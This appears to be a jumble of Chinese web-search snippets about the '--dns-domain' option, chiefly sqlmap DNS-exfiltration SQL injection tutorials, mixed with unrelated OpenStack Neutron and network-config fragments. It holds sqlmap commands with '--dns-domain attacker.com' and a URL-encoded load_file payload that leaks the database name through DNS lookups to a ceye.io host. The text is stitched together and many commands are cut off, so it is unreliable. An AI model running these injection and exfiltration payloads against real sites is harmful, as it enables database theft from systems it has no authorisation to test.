接下来模拟测试环境 用 sqlmap –dns-domain 参数进行dns通道注入 A -> win8 -> web server && sqli B -> ubuntu 14 id=5000” –tech “B” –dns-domain “whoami.com” –dbs 同时b上面开启tcpdump [email protected]:~# tcpdump -i
网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下--dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里(主要是菜,关键还没大佬带)。 Sqlmap中加入参数--dns-domain=b.com --hex即可 ? 来到这一步sqlmap会卡住提示设置DNS服务器实例 直接Ctrl+C ? 提示通过DNS通道的数据检索成功。
2.3 Neutron with Designate 为了集成DNS功能,Neutron创建网络时,新增了一个参数,“--dns-domain”。 另外需要注意的是,Neutron创建网络时,如果指定了dns-domain,Neutron是认为对应的DNS Zone已经存在于Designate中,所以为了正常使用,需要先在Designate中创建DNS 一个完整的流程如下所示: Shell 1234 $ openstack zone create --email my@test.com test.org.$ neutron net-create dns-net --dns-domain 我们多了一条A类型的DNS记录,IP地址是FloatingIP地址,hostname是虚机名+虚机所在网络的dns-domain。
; \\ 经过传输后会变成\ txf是域名的下级目录,可以随便构造 执行后服务器就会有数据包(xxx.zka7.xyz)出现 Sqlmap的自动化实现 在sqlmap中实现DNS注入加上参数–dns-domain
=1%27%20and%20load_file(concat(%22\\\\%22,database(),%22.bgwqmj.ceye.io\\abc%22))--+ 看到平台回显 sqlmap的–dns-domain id=1" --technique=T --dns-domain "oupeng.top" -D security --tables 4.11 报错注入7大常用函数 4.11.1 ST_LatFromGeoHash
"--disable-anonymous-metrics=false", "--single-account-mode-domain=vpn.example.com", "--dns-domain
number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain 要测试联合查询SQL注入的列范围 --union-char = UCHAR 在暴力破解列数时要使用的字符 --union-from = UFROM 在联合查询SQL注入的FROM部分中要使用的表 --dns-domain
number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain
iface eth0 inet static address 192.168.1.141 netmask 255.255.255.0 gateway 192.168.1.1 dns-domain
union-from=UFROM 要在 UNION 查询 SQL 注入的 FROM 部分中使用的表 --union-values=UNION_VALUES 要用于 UNION 查询 SQL 注入的列值 --dns-domain
UCOLS 为联合查询的SQL注入测试列范围 –union-char=UCHAR 字符使用bruteforcing列数 –union-from=UFROM 表使用从联合查询的SQL注入的一部分 –dns-domain
--dns-domain=DNS.. :域名用于DNS漏出攻击。 --second-order=S.. :生成页面的URL搜索为second-order响应。
time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)–union-cols=UCOLS 定列范围用于测试UNION查询注入–union-char=UCHAR 用于暴力猜解列数的字符--dns-domain
5.DNS泄露攻击 参数:–dns-domain 假设攻击者控制着某域名(例如:attacker.com)的域名解析服务器,即查询该域名的子域名对应的IP地址都会到这台域名解析服务器来查询。 这时攻击者就可以使用“–dns-domain attacker.com”来进行DNS泄露攻击。
number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain
--dns-domain=DNS.. 如果你控制了一台dns服务器,使用这个可以提高效率。例: --dns-domain 123.com --second-order=S..
通过设置DNS流量来突破限制 –dns-domain “dns服务器” 需要用户自身具有一个开放53端口的DNS服务器,通过DNS流量来获得Web应用程序中数据内容。
6.DNS泄露攻击 参数:–dns-domain SQL注入中的DNS泄露攻击详情见论文《Data Retrieval over DNS in SQL Injection Attacks》。 这时攻击者就可以使用“–dns-domain attacker.com”来进行DNS泄露攻击。
id=1" --technique D --dns-domain attacker.com 4.1.3 SQLmap盲注实战案例分析 案例背景:某在线购物平台的商品搜索功能存在SQL盲注漏洞。